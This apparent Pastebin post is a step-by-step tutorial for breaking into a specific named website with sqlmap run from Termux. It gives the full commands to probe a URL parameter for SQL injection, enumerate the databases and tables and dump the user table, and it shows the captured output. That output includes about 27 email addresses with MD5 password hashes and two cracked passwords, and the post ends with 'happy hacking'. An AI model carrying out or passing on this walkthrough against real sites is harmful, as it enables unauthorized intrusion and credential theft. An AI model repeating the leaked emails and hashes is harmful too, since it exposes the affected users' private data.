Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- to check if a website if vulnerable add a ' to the end of the URL
- like this:
- http://www.100safe.com/user.php?uid=46
- becomes:
- http://www.100safe.com/user.php?uid=46'
- if the website is vulnerable you should see an error like this somewhere on the page:
- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
- now we will need to install then open termux.
- first we need to install python 2 and unzip. type:
- dpgk install python2 unzip
- download the latest sqlmap zip package from sqlmap.org
- next run these three commands:
- cd /sdcard/Download/
- unzip sqlmap*.zip
- cd sqlmap*
- now we get started!
- next we are going to list the databases on the target website, enter this command.
- python2 sqlmap.py --url=http://www.100safe.com/user.php?uid=46 --dbs
- if you get this it almost always means the site can be hacked:
- [10:57:59] [INFO] heuristic (basic) test shows that GET parameter 'uid' might be injectable (possible DBMS: 'MySQL')
- [10:58:00] [INFO] heuristic (XSS) test shows that GET parameter 'uid' might be vulnerable to cross-site scripting (XSS) attacks
- [10:58:00] [INFO] testing for SQL injection on GET parameter 'uid'
- once it says this:
- it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
- type Y then press enter
- next you will get this
- for the remaining tests, do you want to include all tests for 'MySQL' extending
- provided level (1) and risk (1) values? [Y/n]
- type Y then press enter
- once its done doing tests and finds a working injection method you will see output that should look like this:
- [10:05:15] [INFO] fetching database names
- [10:05:15] [INFO] used SQL query returns 8 entries
- [10:05:15] [INFO] resumed: information_schema
- [10:05:15] [INFO] resumed: 100safe
- [10:05:15] [INFO] resumed: Iloveyou
- [10:05:15] [INFO] resumed: hypocket_api
- [10:05:15] [INFO] resumed: mysql
- [10:05:15] [INFO] resumed: now
- [10:05:15] [INFO] resumed: performance_schema
- [10:05:15] [INFO] resumed: superpay_api
- available databases [8]:
- [*] 100safe
- [*] hypocket_api
- [*] Iloveyou
- [*] information_schema
- [*] mysql
- [*] now
- [*] performance_schema
- [*] superpay_api
- ^ those are the databases on the vulnerable server.
- to list the tables in a database use this command:
- python2 sqlmap.py --url=http://www.100safe.com/user.php?uid=46 -D 100safe --tables
- the output should look like this:
- [10:07:32] [INFO] fetching tables for database: '100safe'
- [10:07:32] [INFO] used SQL query returns 39 entries
- Database: 100safe
- [39 tables]
- +------------------+
- | pb_admingroups |
- | pb_adminlogs |
- | pb_adminonlines |
- | pb_announcements |
- | pb_applyinvite |
- | pb_attachments |
- | pb_categories |
- | pb_cdata |
- | pb_comments |
- | pb_commonlogs |
- | pb_configs |
- | pb_friends |
- | pb_fsession |
- | pb_guestmsg |
- | pb_invitecode |
- | pb_links |
- | pb_memberdata |
- | pb_memberexp |
- | pb_members |
- | pb_message |
- | pb_onlines |
- | pb_plugins |
- | pb_regions |
- | pb_scaches |
- | pb_sitestat |
- | pb_special |
- | pb_splink |
- | pb_tagcache |
- | pb_tags |
- | pb_tdata |
- | pb_templates |
- | pb_threads |
- | pb_threads_home |
- | pb_threads_tmp |
- | pb_tinfo |
- | pb_tinfo_home |
- | pb_tinfo_tmp |
- | pb_tplvar |
- | pb_usergroups |
- +------------------+
- ^ those are the tables in the database "100safe"
- obviously we want to choose dump (download or read) the table pb_members cause it likely contains passwords of users.
- first we have to list the columns in the table. type in this command:
- python2 sqlmap.py --url=http://www.100safe.com/user.php?uid=46 -D 100safe -T pb_members --columns
- the columns should look similar this for most user tables:
- [10:25:43] [INFO] fetching columns for table 'pb_members' in database '100safe'
- [10:25:43] [INFO] used SQL query returns 9 entries
- [10:25:43] [INFO] resumed: uid
- [10:25:43] [INFO] resumed: mediumint(8) unsigned
- [10:25:43] [INFO] resumed: username
- [10:25:43] [INFO] resumed: varchar(20)
- [10:25:43] [INFO] resumed: password
- [10:25:43] [INFO] resumed: char(32)
- [10:25:43] [INFO] resumed: email
- [10:25:43] [INFO] resumed: varchar(100)
- [10:25:43] [INFO] resumed: adminid
- [10:25:43] [INFO] resumed: tinyint(3)
- [10:25:43] [INFO] resumed: groupid
- [10:25:43] [INFO] resumed: tinyint(3)
- [10:25:43] [INFO] resumed: publicemail
- [10:25:43] [INFO] resumed: tinyint(1)
- [10:25:43] [INFO] resumed: regip
- [10:25:43] [INFO] resumed: char(15)
- [10:25:43] [INFO] resumed: regdate
- [10:25:43] [INFO] resumed: int(10) unsigned
- Database: 100safe
- Table: pb_members
- [9 columns]
- +-------------+-----------------------+
- | Column | Type |
- +-------------+-----------------------+
- | adminid | tinyint(3) |
- | email | varchar(100) |
- | groupid | tinyint(3) |
- | password | char(32) |
- | publicemail | tinyint(1) |
- | regdate | int(10) unsigned |
- | regip | char(15) |
- | uid | mediumint(8) unsigned |
- | username | varchar(20) |
- +-------------+-----------------------+
- Now we will extract all the entries in the columns email, and password from the database:
- python2 sqlmap.py --url=http://www.100safe.com/user.php?uid=46 -D 100safe -T pb_members -C email,password --dump
- sadly the passwords on this site are encrypted with MD5, but we were able to crack a couple.
- by the way sometimes on other websites the passwords are all plaintext! (unencrypted!)
- here is the output with what you should type in the prompts already there so you know what to do.
- [10:30:15] [INFO] fetching entries of column(s) 'email, password' for table 'pb_members' in database '100safe'
- [10:30:15] [INFO] used SQL query returns 790 entries
- [10:30:15] [WARNING] reflective value(s) found and filtering out
- [10:30:15] [INFO] retrieved: 1786ec46a1e6b28d3ede31ff2c4bf78b
- [10:30:15] [INFO] retrieved: 2plwvce9@30spmcuw.com
- [10:30:16] [INFO] retrieved: 49ba8995a4ed9671a0f7b8460c8fdedc
- [10:30:16] [INFO] retrieved: 3216016593@qq.com
- [10:30:16] [INFO] retrieved: b79b84652032835f635b4d0d4dd149e3
- [10:30:17] [INFO] retrieved: 39p532uq@5jbrl7qb.com
- [10:30:17] [INFO] retrieved: d8a79e5469223f6800448a2e247efdb7
- [10:30:17] [INFO] retrieved: 3e3yng79@r5odsr8g.com
- [10:30:17] [INFO] retrieved: 3653f8e024ade70beaf337c647af8eda
- [10:30:18] [INFO] retrieved: 3ioo9ytx@17igz8i8.com
- [10:30:18] [INFO] retrieved: d958f8dec96e85768387583d4cbb26dc
- [10:30:18] [INFO] retrieved: 3vxah88n@eoguvus4.com
- [10:30:19] [INFO] retrieved: 76ee1658d44021e53831bce63a465b37
- [10:30:19] [INFO] retrieved: 43w6ua0g@3cmq9zgd.com
- [10:30:19] [INFO] retrieved: fef3d38d2fed7a7f9d1c7f29a2c67a83
- [10:30:19] [INFO] retrieved: 446382023@qq.com
- [10:30:20] [INFO] retrieved: f96602e40dde4889fc2da79c3514abf3
- [10:30:20] [WARNING] user aborted during enumeration. sqlmap will display partial output
- [10:30:20] [INFO] recognized possible password hashes in column 'password'
- do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
- do you want to crack them via a dictionary-based attack? [Y/n/q] Y
- [10:30:31] [INFO] using hash method 'md5_generic_passwd'
- what dictionary do you want to use?
- [1] default dictionary file 'C:\Users\New Owner\Desktop\Cracking\sqlmapproject-s
- qlmap-5e2d0bd\txt\wordlist.zip' (press Enter)
- [2] custom dictionary file
- [3] file with list of dictionary files
- > 1
- [10:30:35] [INFO] using default dictionary
- do you want to use common password suffixes? (slow!) [y/N] N
- [10:30:38] [INFO] starting dictionary-based cracking (md5_generic_passwd)
- [10:30:38] [INFO] starting 2 processes
- [10:30:44] [INFO] cracked password '19850110' for hash 'dd3cda213b3da62490992d6a5e181874'
- [10:30:45] [INFO] cracked password '123456' for hash 'e10adc3949ba59abbe56e057f20f883e'
- Database: 100safe
- Table: pb_members
- [27 entries]
- +------------------------+---------------------------------------------+
- | email | password |
- +------------------------+---------------------------------------------+
- | 03ac6xea@fvhpa9ch.com | d6ff2b7b856f3b445340e9ccdf157929 |
- | 0408eric@pchome.com.tw | c96a267ff0f21de27cc50f9c45c3b8fb |
- | 07fff12w@quamhish.com | 891cbd7089d0e9f11a271b01cdf46e74 |
- | 0980155147@qma.com.tw | dd3cda213b3da62490992d6a5e181874 (19850110) |
- | 0azdydba@acaajp4m.com | 1b6b638cc4d1d7d32928e2f9b80b1797 |
- | 0bbgzl32@jssm911y.com | 1947e832f3baf43b0b4b5f5917ea1df5 |
- | 0ojrmsbz@ybru62d2.com | a38fcd68f6d7639ce1562020dd7e20e3 |
- | 0qgl9cts@qp6ccox9.com | 0385ee7071f1bb3f8712583f881b02ab |
- | 0xq4trm9@h5rzk35x.com | 8adfb726303aa07c55dc7b255e67ad4b |
- | 1048825dfdf152@qq.com | 02569624d5d0f06b17715d93d9eccc96 |
- | 1312760466@qq.com | e10adc3949ba59abbe56e057f20f883e (123456) |
- | 1598784253@qq.com | b71588f2be4628689b70beee50fe760f |
- | 1nca4m9o@zrr575k6.com | e3f87375269063de254da661034b537a |
- | 1nwpkj4a@iaysr57h.com | dddca8c5a130281102228c4b0f8b3b32 |
- | 1vml8miz@hadf8rqa.com | 6fe0ae027b11a404987d5431d71c2125 |
- | 2161283@163.com | e10adc3949ba59abbe56e057f20f883e (123456) |
- | 234owhb3@0ozh2tcs.com | 779ddc203741c1892a3456a951b73a9a |
- | 2ltlsq9i@cka0adls.com | 05494fa729bbefcf1acea2c180c7e04a |
- | 2nwy5tvv@rwe8lbpt.com | 1786ec46a1e6b28d3ede31ff2c4bf78b |
- | 2plwvce9@30spmcuw.com | 49ba8995a4ed9671a0f7b8460c8fdedc |
- | 3216016593@qq.com | b79b84652032835f635b4d0d4dd149e3 |
- | 39p532uq@5jbrl7qb.com | d8a79e5469223f6800448a2e247efdb7 |
- | 3e3yng79@r5odsr8g.com | 3653f8e024ade70beaf337c647af8eda |
- | 3ioo9ytx@17igz8i8.com | d958f8dec96e85768387583d4cbb26dc |
- | 3vxah88n@eoguvus4.com | 76ee1658d44021e53831bce63a465b37 |
- | 43w6ua0g@3cmq9zgd.com | fef3d38d2fed7a7f9d1c7f29a2c67a83 |
- | 446382023@qq.com | f96602e40dde4889fc2da79c3514abf3 |
- +------------------------+---------------------------------------------+
- [10:32:32] [INFO] table '`100safe`.pb_members' dumped to CSV file 'C:\Users\New Owner\.sqlmap\output\www.100safe.com\dump\100safe\pb_members.csv'
- you can increase the speed of dumping by adding the option --threads=10 to the end of the dump command.
- and ya thats basically it! thats pretty much all you need to know about sqlmap!!! happy hacking mister 1337
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement